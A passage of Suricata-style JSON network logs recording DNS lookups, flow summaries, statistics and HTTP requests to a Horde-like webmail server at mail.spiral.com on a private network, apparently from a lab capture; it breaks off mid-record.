{"timestamp":"2020-02-29T00:01:32.000295+0000","flow_id":2134528561762561,"event_type":"flow","src_ip":"192.168.10.122","src_port":56514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:31.315649+0000","end":"2020-02-28T23:56:31.423684+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000227+0000","flow_id":285721234508130,"event_type":"flow","src_ip":"192.168.10.122","src_port":59579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.657762+0000","end":"2020-02-28T23:56:32.766092+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000465+0000","flow_id":1885441933501218,"event_type":"flow","src_ip":"192.168.10.122","src_port":49099,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.844578+0000","end":"2020-02-28T23:56:32.956150+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000662+0000","flow_id":1923147451373618,"event_type":"flow","src_ip":"192.168.10.122","src_port":34286,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.235570+0000","end":"2020-02-28T23:56:32.347026+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:01:34.000690+0000","flow_id":1913015623544439,"event_type":"flow","src_ip":"192.168.10.122","src_port":35939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.978551+0000","end":"2020-02-28T23:56:33.086800+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000485+0000","flow_id":43983295356035,"event_type":"flow","src_ip":"192.168.10.122","src_port":46502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.269443+0000","end":"2020-02-28T23:56:34.377451+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000762+0000","flow_id":2204137096906147,"event_type":"flow","src_ip":"192.168.10.122","src_port":40372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.099747+0000","end":"2020-02-28T23:56:34.211348+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.170866+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} 
{"timestamp":"2020-02-29T00:01:36.000552+0000","flow_id":76715215099822,"event_type":"flow","src_ip":"192.168.10.130","src_port":33908,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":54,"pkts_toclient":68,"bytes_toserver":5107,"bytes_toclient":83382,"start":"2020-02-28T23:49:57.202670+0000","end":"2020-02-28T23:51:32.624050+0000","age":95,"state":"established","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"fin_wait2"}} {"timestamp":"2020-02-29T00:01:37.000831+0000","flow_id":1537012727240391,"event_type":"flow","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":8,"bytes_toserver":1283,"bytes_toclient":6321,"start":"2020-02-29T00:00:31.218823+0000","end":"2020-02-29T00:00:36.480214+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:01:38.000216+0000","event_type":"stats","stats":{"uptime":13750,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2231,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37285,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:44.000388+0000","flow_id":2150733489452806,"event_type":"flow","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6321,"start":"2020-02-29T00:00:37.866054+0000","end":"2020-02-29T00:00:43.093966+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:45.000183+0000","event_type":"stats","stats":{"uptime":13757,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2638,"new_pruned":15,"est_pruned":2231,"bypasse
d_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37205,"memcap":0}}} {"timestamp":"2020-02-29T00:01:45.001653+0000","flow_id":452932915956904,"event_type":"flow","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1180,"bytes_toclient":709,"start":"2020-02-29T00:00:16.593064+0000","end":"2020-02-29T00:00:44.595345+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:46.933558+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57196,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:47.144742+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23414,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:50.000629+0000","flow_id":1256757506654995,"event_type":"flow","src_ip":"192.168.10.122","src_port":60917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:48.967443+0000","end":"2020-02-28T23:56:49.075802+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:01:52.000199+0000","event_type":"stats","stats":{"uptime":13764,"capture":{"kernel_packets":132330,"kernel_drops":0},"decoder":{"pkts":132361,"bytes":91905859,"invalid":178,"ipv4":130938,"ipv6":8,"ethernet":132361,"raw":0,"null":0,"sll":0,"tcp":125966,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2640,"new_pruned":15,"est_pruned":2232,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18515,"memcap_state":0,"memcap_global":0},"http":{"memuse":37125,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:52.001029+0000","flow_id":2118594249540551,"event_type":"flow","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":16,"bytes_toserver":2706,"bytes_toclient":11394,"start":"2020-02-29T00:00:42.377799+0000","end":"2020-02-29T00:00:51.314644+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:55.000643+0000","flow_id":2239244160873526,"event_type":"flow","src_ip":"192.168.10.122","src_port":46652,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:54.144438+0000","end":"2020-02-28T23:56:54.252490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:58.221235+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49258,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:58.479290+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611}} {"timestamp":"2020-02-29T00:01:59.000177+0000","event_type":"stats","stats":{"uptime":13771,"capture":{"kernel_packets":132364,"kernel_drops":0},"decoder":{"pkts":132366,"bytes":91906141,"invalid":178,"ipv4":130941,"ipv6":8,"ethernet":132366,"raw":0,"null":0,"sll":0,"tcp":125969,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_prun
ed":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":122658,"memcap":0}}} {"timestamp":"2020-02-29T00:02:01.583898+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59173,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.605340+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:02:01.614287+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.772272+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:02:01.809666+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like 
Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785}} {"timestamp":"2020-02-29T00:02:02.054004+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:02:02.063370+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61179,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:02:04.735204+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35363,"tx_id":0}} {"timestamp":"2020-02-29T00:02:04.750794+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2110,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:04.970705+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
